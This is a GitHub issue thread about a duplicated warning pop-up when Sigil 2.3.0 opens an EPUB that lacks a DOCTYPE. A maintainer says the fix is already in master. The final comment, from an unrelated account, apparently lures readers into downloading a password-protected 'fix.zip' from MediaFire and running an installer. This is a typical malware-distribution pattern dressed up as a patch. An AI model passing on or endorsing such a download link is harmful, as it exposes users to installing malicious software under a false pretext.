### ISSUE TITLE
[Bug]: Double Warning Pop-up

### ISSUE THREAD

**Issue by SirGryphin** [Sigil-Ebook/Sigil#769]
### Bug Description

When opening a epub with missing DOCTYPE with warning message pop up twice for some reason.
![Capture](https://github.com/user-attachments/assets/74936c03-4fd0-4889-9a9a-81dedd36419a)

### Platform (OS)

Windows (Default)

### OS Version / Specifics

Windows 10 Pro Version	22H2 19045.4780

### What version of Sigil are you using?

2.3.0

**Comment by kevinhendricks** [comment]
Already reported on our MobileRead User forum and a fix has already been pushed to master and will appear in the next release.

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."
